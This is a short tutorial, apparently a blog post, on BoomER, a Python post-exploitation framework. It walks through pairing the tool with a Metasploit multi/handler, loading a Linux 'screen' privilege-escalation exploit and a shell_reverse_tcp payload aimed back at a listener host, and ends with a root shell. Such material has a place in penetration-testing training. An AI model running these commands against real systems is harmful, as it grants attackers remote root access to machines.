BoomER is a Command-line interface python open-source framework fully developed in Python 3.X for post-exploitation of targets with the objective to exploit local vulnerabilities on the big three OS’s (Windows/Linux/Mac). The tool allows for interaction with third-party software like Metasploit to chain attacks together.
Installation
1 – Go to the Github Repository
2 – git clone https://github.com/Josue87/BoomER
2 – cd BoomER
3 – Install requirements depends on your system OS
Since I’m using Kali I will sudo pip3 install -r linuxrequirements.txt
Usage
To explain the usage of BoomER in this example we use Metasploit and try to perform a local exploitation attack on Kali using normal user privileges
1 – We launch Metasploit with the command msfconsole
or msfdb run
1.1 we type use exploit/multi/handler
1.2 set LHOSt {yourip}
1.3 set LPORT {yourport}
2 – we launch BoomER with the command python3 boomer.py
2.1 Loading Linux module and the payloadload linux/elevation/screen_exploit
put payload msf/linux/x64/shell_reverse_tcp
2.2 we set the same LHOST and LPORT we made on Metasploit in BoomER put lhost {yourip}
put lport {yourport}
3 – We run exploit -j -z
in Metasploit and run
in BoomER
4 – and we get our root shell
Pros
– Fully Customized
– Easy Syntax (Similar to MSF)